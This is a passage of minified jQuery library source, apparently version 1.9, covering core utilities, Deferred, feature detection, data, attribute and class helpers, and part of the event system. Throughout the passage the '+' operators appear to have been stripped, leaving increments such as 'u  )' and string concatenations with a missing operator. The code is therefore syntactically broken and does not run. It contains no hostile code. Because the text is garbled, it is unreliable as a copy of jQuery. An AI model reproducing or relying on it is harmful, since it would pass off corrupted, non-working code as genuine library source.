this.eq(-1)},eq:function(e){var t=this.length,n= e (0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(st.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:tt,sort:[].sort,splice:[].splice},st.fn.init.prototype=st.fn,st.extend=st.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},u=1,l=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},u=2),"object"==typeof s||st.isFunction(s)||(s={}),l===u&&(s=this,--u);l>u;u  )if(null!=(e=arguments[u]))for(n in e)r=s[n],i=e[n],s!==i&&(c&&i&&(st.isPlainObject(i)||(o=st.isArray(i)))?(o?(o=!1,a=r&&st.isArray(r)?r:[]):a=r&&st.isPlainObject(r)?r:{},s[n]=st.extend(c,a,i)):i!==t&&(s[n]=i));return s},st.extend({noConflict:function(t){return e.$===st&&(e.$=G),t&&e.jQuery===st&&(e.jQuery=J),st},isReady:!1,readyWait:1,holdReady:function(e){e?st.readyWait  :st.ready(!0)},ready:function(e){if(e===!0?!--st.readyWait:!st.isReady){if(!V.body)return setTimeout(st.ready);st.isReady=!0,e!==!0&&--st.readyWait>0||(U.resolveWith(V,[st]),st.fn.trigger&&st(V).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===st.type(e)},isArray:Array.isArray||function(e){return"array"===st.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e "":"object"==typeof e||"function"==typeof e?Q[it.call(e)]||"object":typeof e},isPlainObject:function(e){if(!e||"object"!==st.type(e)||e.nodeType||st.isWindow(e))return!1;try{if(e.constructor&&!ot.call(e,"constructor")&&!ot.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return r===t||ot.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||V;var r=pt.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=st.buildFragment([e],t,i),i&&st(i).remove(),st.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=st.trim(n),n&&dt.test(n.replace(gt,"@").replace(mt,"]").replace(ht,"")))?Function("return " n)():(st.error("Invalid JSON: " n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||st.error("Invalid XML: " n),r},noop:function(){},globalEval:function(t){t&&st.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(yt,"ms-").replace(vt,bt)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,r){var i,o=0,a=e.length,s=n(e);if(r){if(s)for(;a>o&&(i=t.apply(e[o],r),i!==!1);o  );else for(o in e)if(i=t.apply(e[o],r),i===!1)break}else if(s)for(;a>o&&(i=t.call(e[o],o,e[o]),i!==!1);o  );else for(o in e)if(i=t.call(e[o],o,e[o]),i===!1)break;return e},trim:at&&!at.call("\ufeff\u00a0")?function(e){return null==e?"":at.call(e)}:function(e){return null==e?"":(e "").replace(ct,"")},makeArray:function(e,t){var r=t||[];return null!=e&&(n(Object(e))?st.merge(r,"string"==typeof e?[e]:e):tt.call(r,e)),r},inArray:function(e,t,n){var r;if(t){if(rt)return rt.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r n):n:0;r>n;n  )if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o  )e[i  ]=n[o];else for(;n[o]!==t;)e[i  ]=n[o  ];return e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o  )r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,r){var i,o=0,a=e.length,s=n(e),u=[];if(s)for(;a>o;o  )i=t(e[o],o,r),null!=i&&(u[u.length]=i);else for(o in e)i=t(e[o],o,r),null!=i&&(u[u.length]=i);return et.apply([],u)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(r=e[n],n=e,e=r),st.isFunction(e)?(i=nt.call(arguments,2),o=function(){return e.apply(n||this,i.concat(nt.call(arguments)))},o.guid=e.guid=e.guid||st.guid  ,o):t},access:function(e,n,r,i,o,a,s){var u=0,l=e.length,c=null==r;if("object"===st.type(r)){o=!0;for(u in r)st.access(e,n,u,r[u],!0,a,s)}else if(i!==t&&(o=!0,st.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(st(e),n)})),n))for(;l>u;u  )n(e[u],r,s?i:i.call(e[u],u,n(e[u],r)));return o?e:c?n.call(e):l?n(e[0],r):a},now:function(){return(new Date).getTime()}}),st.ready.promise=function(t){if(!U)if(U=st.Deferred(),"complete"===V.readyState)setTimeout(st.ready);else if(V.addEventListener)V.addEventListener("DOMContentLoaded",xt,!1),e.addEventListener("load",st.ready,!1);else{V.attachEvent("onreadystatechange",xt),e.attachEvent("onload",st.ready);var n=!1;try{n=null==e.frameElement&&V.documentElement}catch(r){}n&&n.doScroll&&function i(){if(!st.isReady){try{n.doScroll("left")}catch(e){return setTimeout(i,50)}st.ready()}}()}return U.promise(t)},st.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){Q["[object " t "]"]=t.toLowerCase()}),X=st(V);var Tt={};st.Callbacks=function(e){e="string"==typeof e?Tt[e]||r(e):st.extend({},e);var n,i,o,a,s,u,l=[],c=!e.once&&[],f=function(t){for(n=e.memory&&t,i=!0,u=a||0,a=0,s=l.length,o=!0;l&&s>u;u  )if(l[u].apply(t[0],t[1])===!1&&e.stopOnFalse){n=!1;break}o=!1,l&&(c?c.length&&f(c.shift()):n?l=[]:p.disable())},p={add:function(){if(l){var t=l.length;(function r(t){st.each(t,function(t,n){var i=st.type(n);"function"===i?e.unique&&p.has(n)||l.push(n):n&&n.length&&"string"!==i&&r(n)})})(arguments),o?s=l.length:n&&(a=t,f(n))}return this},remove:function(){return l&&st.each(arguments,function(e,t){for(var n;(n=st.inArray(t,l,n))>-1;)l.splice(n,1),o&&(s>=n&&s--,u>=n&&u--)}),this},has:function(e){return st.inArray(e,l)>-1},empty:function(){return l=[],this},disable:function(){return l=c=n=t,this},disabled:function(){return!l},lock:function(){return c=t,n||p.disable(),this},locked:function(){return!c},fireWith:function(e,t){return t=t||[],t=[e,t.slice?t.slice():t],!l||i&&!c||(o?c.push(t):f(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},st.extend({Deferred:function(e){var t=[["resolve","done",st.Callbacks("once memory"),"resolved"],["reject","fail",st.Callbacks("once memory"),"rejected"],["notify","progress",st.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return st.Deferred(function(n){st.each(t,function(t,o){var a=o[0],s=st.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&st.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a "With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?st.extend(e,r):r}},i={};return r.pipe=r.then,st.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0] "With"](this===i?r:this,arguments),this},i[o[0] "With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t,n,r,i=0,o=nt.call(arguments),a=o.length,s=1!==a||e&&st.isFunction(e.promise)?a:0,u=1===s?e:st.Deferred(),l=function(e,n,r){return function(i){n[e]=this,r[e]=arguments.length>1?nt.call(arguments):i,r===t?u.notifyWith(n,r):--s||u.resolveWith(n,r)}};if(a>1)for(t=Array(a),n=Array(a),r=Array(a);a>i;i  )o[i]&&st.isFunction(o[i].promise)?o[i].promise().done(l(i,r,o)).fail(u.reject).progress(l(i,n,t)):--s;return s||u.resolveWith(r,o),u.promise()}}),st.support=function(){var n,r,i,o,a,s,u,l,c,f,p=V.createElement("div");if(p.setAttribute("className","t"),p.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",r=p.getElementsByTagName("*"),i=p.getElementsByTagName("a")[0],!r||!i||!r.length)return{};o=V.createElement("select"),a=o.appendChild(V.createElement("option")),s=p.getElementsByTagName("input")[0],i.style.cssText="top:1px;float:left;opacity:.5",n={getSetAttribute:"t"!==p.className,leadingWhitespace:3===p.firstChild.nodeType,tbody:!p.getElementsByTagName("tbody").length,htmlSerialize:!!p.getElementsByTagName("link").length,style:/top/.test(i.getAttribute("style")),hrefNormalized:"/a"===i.getAttribute("href"),opacity:/^0.5/.test(i.style.opacity),cssFloat:!!i.style.cssFloat,checkOn:!!s.value,optSelected:a.selected,enctype:!!V.createElement("form").enctype,html5Clone:"<:nav></:nav>"!==V.createElement("nav").cloneNode(!0).outerHTML,boxModel:"CSS1Compat"===V.compatMode,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},s.checked=!0,n.noCloneChecked=s.cloneNode(!0).checked,o.disabled=!0,n.optDisabled=!a.disabled;try{delete p.test}catch(d){n.deleteExpando=!1}s=V.createElement("input"),s.setAttribute("value",""),n.input=""===s.getAttribute("value"),s.value="t",s.setAttribute("type","radio"),n.radioValue="t"===s.value,s.setAttribute("checked","t"),s.setAttribute("name","t"),u=V.createDocumentFragment(),u.appendChild(s),n.appendChecked=s.checked,n.checkClone=u.cloneNode(!0).cloneNode(!0).lastChild.checked,p.attachEvent&&(p.attachEvent("onclick",function(){n.noCloneEvent=!1}),p.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})p.setAttribute(l="on" f,"t"),n[f "Bubbles"]=l in e||p.attributes[l].expando===!1;return p.style.backgroundClip="content-box",p.cloneNode(!0).style.backgroundClip="",n.clearCloneStyle="content-box"===p.style.backgroundClip,st(function(){var r,i,o,a="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",s=V.getElementsByTagName("body")[0];s&&(r=V.createElement("div"),r.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",s.appendChild(r).appendChild(p),p.innerHTML="<table><tr><td></td><td>t</td></tr></table>",o=p.getElementsByTagName("td"),o[0].style.cssText="padding:0;margin:0;border:0;display:none",c=0===o[0].offsetHeight,o[0].style.display="",o[1].style.display="none",n.reliableHiddenOffsets=c&&0===o[0].offsetHeight,p.innerHTML="",p.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",n.boxSizing=4===p.offsetWidth,n.doesNotIncludeMarginInBodyOffset=1!==s.offsetTop,e.getComputedStyle&&(n.pixelPosition="1%"!==(e.getComputedStyle(p,null)||{}).top,n.boxSizingReliable="4px"===(e.getComputedStyle(p,null)||{width:"4px"}).width,i=p.appendChild(V.createElement("div")),i.style.cssText=p.style.cssText=a,i.style.marginRight=i.style.width="0",p.style.width="1px",n.reliableMarginRight=!parseFloat((e.getComputedStyle(i,null)||{}).marginRight)),p.style.zoom!==t&&(p.innerHTML="",p.style.cssText=a "width:1px;padding:1px;display:inline;zoom:1",n.inlineBlockNeedsLayout=3===p.offsetWidth,p.style.display="block",p.innerHTML="<div></div>",p.firstChild.style.width="5px",n.shrinkWrapBlocks=3!==p.offsetWidth,s.style.zoom=1),s.removeChild(r),r=p=o=i=null)}),r=o=u=a=i=s=null,n}();var wt=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,Nt=/([A-Z])/g;st.extend({cache:{},expando:"jQuery" (Z Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?st.cache[e[st.expando]]:e[st.expando],!!e&&!s(e)},data:function(e,t,n){return i(e,t,n,!1)},removeData:function(e,t){return o(e,t,!1)},_data:function(e,t,n){return i(e,t,n,!0)},_removeData:function(e,t){return o(e,t,!0)},acceptData:function(e){var t=e.nodeName&&st.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),st.fn.extend({data:function(e,n){var r,i,o=this[0],s=0,u=null;if(e===t){if(this.length&&(u=st.data(o),1===o.nodeType&&!st._data(o,"parsedAttrs"))){for(r=o.attributes;r.length>s;s  )i=r[s].name,i.indexOf("data-")||(i=st.camelCase(i.substring(5)),a(o,i,u[i]));st._data(o,"parsedAttrs",!0)}return u}return"object"==typeof e?this.each(function(){st.data(this,e)}):st.access(this,function(n){return n===t?o?a(o,e,st.data(o,e)):null:(this.each(function(){st.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){st.removeData(this,e)})}}),st.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx") "queue",i=st._data(e,n),r&&(!i||st.isArray(r)?i=st._data(e,n,st.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=st.queue(e,t),r=n.length,i=n.shift(),o=st._queueHooks(e,t),a=function(){st.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),o.cur=i,i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t "queueHooks";return st._data(e,n)||st._data(e,n,{empty:st.Callbacks("once memory").add(function(){st._removeData(e,t "queue"),st._removeData(e,n)})})}}),st.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?st.queue(this[0],e):n===t?this:this.each(function(){var t=st.queue(this,e,n);st._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&st.dequeue(this,e)})},dequeue:function(e){return this.each(function(){st.dequeue(this,e)})},delay:function(e,t){return e=st.fx?st.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=st.Deferred(),a=this,s=this.length,u=function(){--i||o.resolveWith(a,[a])};for("string"!=typeof e&&(n=e,e=t),e=e||"fx";s--;)r=st._data(a[s],e "queueHooks"),r&&r.empty&&(i  ,r.empty.add(u));return u(),o.promise(n)}});var Ct,kt,Et=/[\t\r\n]/g,St=/\r/g,At=/^(?:input|select|textarea|button|object)$/i,jt=/^(?:a|area)$/i,Dt=/^(?:checked|selected|autofocus|autoplay|async|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped)$/i,Lt=/^(?:checked|selected)$/i,Ht=st.support.getSetAttribute,Mt=st.support.input;st.fn.extend({attr:function(e,t){return st.access(this,st.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){st.removeAttr(this,e)})},prop:function(e,t){return st.access(this,st.prop,e,t,arguments.length>1)},removeProp:function(e){return e=st.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,u="string"==typeof e&&e;if(st.isFunction(e))return this.each(function(t){st(this).addClass(e.call(this,t,this.className))});if(u)for(t=(e||"").match(lt)||[];s>a;a  )if(n=this[a],r=1===n.nodeType&&(n.className?(" " n.className " ").replace(Et," "):" ")){for(o=0;i=t[o  ];)0>r.indexOf(" " i " ")&&(r =i " ");n.className=st.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,u=0===arguments.length||"string"==typeof e&&e;if(st.isFunction(e))return this.each(function(t){st(this).removeClass(e.call(this,t,this.className))});if(u)for(t=(e||"").match(lt)||[];s>a;a  )if(n=this[a],r=1===n.nodeType&&(n.className?(" " n.className " ").replace(Et," "):"")){for(o=0;i=t[o  ];)for(;r.indexOf(" " i " ")>=0;)r=r.replace(" " i " "," ");n.className=e?st.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e,r="boolean"==typeof t;return st.isFunction(e)?this.each(function(n){st(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n)for(var i,o=0,a=st(this),s=t,u=e.match(lt)||[];i=u[o  ];)s=r?s:!a.hasClass(i),a[s?"addClass":"removeClass"](i);else("undefined"===n||"boolean"===n)&&(this.className&&st._data(this,"__className__",this.className),this.className=this.className||e===!1?"":st._data(this,"__className__")||"")})},hasClass:function(e){for(var t=" " e " ",n=0,r=this.length;r>n;n  )if(1===this[n].nodeType&&(" " this[n].className " ").replace(Et," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=st.isFunction(e),this.each(function(r){var o,a=st(this);1===this.nodeType&&(o=i?e.call(this,r,a.val()):e,null==o?o="":"number"==typeof o?o ="":st.isArray(o)&&(o=st.map(o,function(e){return null==e?"":e ""})),n=st.valHooks[this.type]||st.valHooks[this.nodeName.toLowerCase()],n&&"set"in n&&n.set(this,o,"value")!==t||(this.value=o))});if(o)return n=st.valHooks[o.type]||st.valHooks[o.nodeName.toLowerCase()],n&&"get"in n&&(r=n.get(o,"value"))!==t?r:(r=o.value,"string"==typeof r?r.replace(St,""):null==r?"":r)}}}),st.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){for(var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i 1:r.length,u=0>i?s:o?i:0;s>u;u  )if(n=r[u],!(!n.selected&&u!==i||(st.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&st.nodeName(n.parentNode,"optgroup"))){if(t=st(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n=st.makeArray(t);return st(e).find("option").each(function(){this.selected=st.inArray(st(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attr:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return e.getAttribute===t?st.prop(e,n,r):(a=1!==s||!st.isXMLDoc(e),a&&(n=n.toLowerCase(),o=st.attrHooks[n]||(Dt.test(n)?kt:Ct)),r===t?o&&a&&"get"in o&&null!==(i=o.get(e,n))?i:(e.getAttribute!==t&&(i=e.getAttribute(n)),null==i?t:i):null!==r?o&&a&&"set"in o&&(i=o.set(e,r,n))!==t?i:(e.setAttribute(n,r ""),r):(st.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(lt);if(o&&1===e.nodeType)for(;n=o[i  ];)r=st.propFix[n]||n,Dt.test(n)?!Ht&&Lt.test(n)?e[st.camelCase("default-" n)]=e[r]=!1:e[r]=!1:st.attr(e,n,""),e.removeAttribute(Ht?n:r)},attrHooks:{type:{set:function(e,t){if(!st.support.radioValue&&"radio"===t&&st.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!st.isXMLDoc(e),a&&(n=st.propFix[n]||n,o=st.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):At.test(e.nodeName)||jt.test(e.nodeName)&&e.href?0:t}}}}),kt={get:function(e,n){var r=st.prop(e,n),i="boolean"==typeof r&&e.getAttribute(n),o="boolean"==typeof r?Mt&&Ht?null!=i:Lt.test(n)?e[st.camelCase("default-" n)]:!!i:e.getAttributeNode(n);return o&&o.value!==!1?n.toLowerCase():t},set:function(e,t,n){return t===!1?st.removeAttr(e,n):Mt&&Ht||!Lt.test(n)?e.setAttribute(!Ht&&st.propFix[n]||n,n):e[st.camelCase("default-" n)]=e[n]=!0,n}},Mt&&Ht||(st.attrHooks.value={get:function(e,n){var r=e.getAttributeNode(n);return st.nodeName(e,"input")?e.defaultValue:r&&r.specified?r.value:t

},set:function(e,n,r){return st.nodeName(e,"input")?(e.defaultValue=n,t):Ct&&Ct.set(e,n,r)}}),Ht||(Ct=st.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&("id"===n||"name"===n||"coords"===n?""!==r.value:r.specified)?r.value:t},set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n ="","value"===r||n===e.getAttribute(r)?n:t}},st.attrHooks.contenteditable={get:Ct.get,set:function(e,t,n){Ct.set(e,""===t?!1:t,n)}},st.each(["width","height"],function(e,n){st.attrHooks[n]=st.extend(st.attrHooks[n],{set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}})})),st.support.hrefNormalized||(st.each(["href","src","width","height"],function(e,n){st.attrHooks[n]=st.extend(st.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return null==r?t:r}})}),st.each(["href","src"],function(e,t){st.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}})),st.support.style||(st.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t ""}}),st.support.optSelected||(st.propHooks.selected=st.extend(st.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),st.support.enctype||(st.propFix.enctype="encoding"),st.support.checkOn||st.each(["radio","checkbox"],function(){st.valHooks[this]={get:function(e){return null===e.getAttribute("value")?"on":e.value}}}),st.each(["radio","checkbox"],function(){st.valHooks[this]=st.extend(st.valHooks[this],{set:function(e,n){return st.isArray(n)?e.checked=st.inArray(st(e).val(),n)>=0:t}})});var qt=/^(?:input|select|textarea)$/i,_t=/^key/,Ft=/^(?:mouse|contextmenu)|click/,Ot=/^(?:focusinfocus|focusoutblur)$/,Bt=/^([^.]*)(?:\.(. )|)$/;st.event={global:{},add:function(e,n,r,i,o){var a,s,u,l,c,f,p,d,h,g,m,y=3!==e.nodeType&&8!==e.nodeType&&st._data(e);if(y){for(r.handler&&(a=r,r=a.handler,o=a.selector),r.guid||(r.guid=st.guid  ),(l=y.events)||(l=y.events={}),(s=y.handle)||(s=y.handle=function(e){return st===t||e&&st.event.triggered===e.type?t:st.event.dispatch.apply(s.elem,arguments)},s.elem=e),n=(n||"").match(lt)||[""],c=n.length;c--;)u=Bt.exec(n[c])||[],h=m=u[1],g=(u[2]||"").split(".").sort(),p=st.event.special[h]||{},h=(o?p.delegateType:p.bindType)||h,p=st.event.special[h]||{},f=st.extend({type:h,origType:m,data:i,handler:r,guid:r.guid,selector:o,needsContext:o&&st.expr.match.needsContext.test(o),namespace:g.join(".")},a),(d=l[h])||(d=l[h]=[],d.delegateCount=0,p.setup&&p.setup.call(e,i,g,s)!==!1||(e.addEventListener?e.addEventListener(h,s,!1):e.attachEvent&&e.attachEvent("on" h,s))),p.add&&(p.add.call(e,f),f.handler.guid||(f.handler.guid=r.guid)),o?d.splice(d.delegateCount  ,0,f):d.push(f),st.event.global[h]=!0;e=null}},remove:function(e,t,n,r,i){var o,a,s,u,l,c,f,p,d,h,g,m=st.hasData(e)&&st._data(e);if(m&&(u=m.events)){for(t=(t||"").match(lt)||[""],l=t.length;l--;)if(s=Bt.exec(t[l])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){for(f=st.event.special[d]||{},d=(r?f.delegateType:f.bindType)||d,p=u[d]||[],s=s[2]&&RegExp("(^|\\.)" h.join("\\.(?:.*\\.|)") "(\\.|$)"),a=o=p.length;o--;)c=p[o],!i&&g!==c.origType||n&&n.guid!==c.guid||s&&!s.test(c.namespace)||r&&r!==c.selector&&("**"!==r||!c.selector)||(p.splice(o,1),c.selector&&p.delegateCount--,f.remove&&f.remove.call(e,c));a&&!p.length&&(f.teardown&&f.teardown.call(e,h,m.handle)!==!1||st.removeEvent(e,d,m.handle),delete u[d])}else for(d in u)st.event.remove(e,d t[l],n,r,!0);st.isEmptyObject(u)&&(delete m.handle,st._removeData(e,"events"))}},trigger:function(n,r,i,o){var a,s,u,l,c,f,p,d=[i||V],h=n.type||n,g=n.namespace?n.namespace.split("."):[];if(s=u=i=i||V,3!==i.nodeType&&8!==i.nodeType&&!Ot.test(h st.event.triggered)&&(h.indexOf(".")>=0&&(g=h.split("."),h=g.shift(),g.sort()),c=0>h.indexOf(":")&&"on" h,n=n[st.expando]?n:new st.Event(h,"object"==typeof n&&n),n.isTrigger=!0,n.namespace=g.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)" g.join("\\.(?:.*\\.|)") "(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:st.makeArray(r,[n]),p=st.event.special[h]||{},o||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!o&&!p.noBubble&&!st.isWindow(i)){for(l=p.delegateType||h,Ot.test(l h)||(s=s.parentNode);s;s=s.parentNode)d.push(s),u=s;u===(i.ownerDocument||V)&&d.push(u.defaultView||u.parentWindow||e)}for(a=0;(s=d[a  ])&&!n.isPropagationStopped();)n.type=a>1?l:p.bindType||h,f=(st._data(s,"events")||{})[n.type]&&st._data(s,"handle"),f&&f.apply(s,r),f=c&&s[c],f&&st.acceptData(s)&&f.apply&&f.apply(s,r)===!1&&n.preventDefault();if(n.type=h,!(o||n.isDefaultPrevented()||p._default&&p._default.apply(i.ownerDocument,r)!==!1||"click"===h&&st.nodeName(i,"a")||!st.acceptData(i)||!c||!i[h]||st.isWindow(i))){u=i[c],u&&(i[c]=null),st.event.triggered=h;try{i[h]()}catch(m){}st.event.triggered=t,u&&(i[c]=u)}return n.result}},dispatch:function(e){e=st.event.fix(e);var n,r,i,o,a,s=[],u=nt.call(arguments),l=(st._data(this,"events")||{})[e.type]||[],c=st.event.special[e.type]||{};if(u[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){for(s=st.event.handlers.call(this,e,l),n=0;(o=s[n  ])&&!e.isPropagationStopped();)for(e.currentTarget=o.elem,r=0;(a=o.handlers[r  ])&&!e.isImmediatePropagationStopped();)(!e.namespace_re||e.namespace_re.test(a.namespace))&&(e.handleObj=a,e.data=a.data,i=((st.event.special[a.origType]||{}).handle||a.handler).apply(o.elem,u),i!==t&&(e.result=i)===!1&&(e.preventDefault(),e.stopPropagation()));return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],u=n.delegateCount,l=e.target;if(u&&l.nodeType&&(!e.button||"click"!==e.type))for(;l!=this;l=l.parentNode||this)if(l.disabled!==!0||"click"!==e.type){for(i=[],r=0;u>r;r  )a=n[r],o=a.selector " ",i[o]===t&&(i[o]=a.needsContext?st(o,this).index(l)>=0:st.find(o,this,null,[l]).length),i[o]&&i.push(a);i.length&&s.push({elem:l,handlers:i})}return n.length>u&&s.push({elem:this,handlers:n.slice(u)}),s},fix:function(e){if(e[st.expando])return e;var t,n,r=e,i=st.event.fixHooks[e.type]||{},o=i.props?this.props.concat(i.props):this.props;for(e=new st.Event(r),t=o.length;t--;)n=o[t],e[n]=r[n];return e.target||(e.target=r.srcElement||V),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,i.filter?i.filter(e,r):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,o,a=n.button,s=n.fromElement;return null==e.pageX&&null!=n.clientX&&(r=e.target.ownerDocument||V,i=r.documentElement,o=r.body,e.pageX=n.clientX (i&&i.scrollLeft||o&&o.scrollLeft||0)-(i&&i.clientLeft||o&&o.clientLeft||0),e.pageY=n.clientY (i&&i.scrollTop||o&&o.scrollTop||0)-(i&&i.clientTop||o&&o.clientTop||0)),!e.relatedTarget&&s&&(e.relatedTarget=s===e.target?n.toElement:s),e.which||a===t||(e.which=1&a?1:2&a?3:4&a?2:0),e}},special:{load:{noBubble:!0},click:{trigger:function(){return st.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t}},focus:{trigger:function(){if(this!==V.activeElement&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===V.activeElement&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=st.extend(new 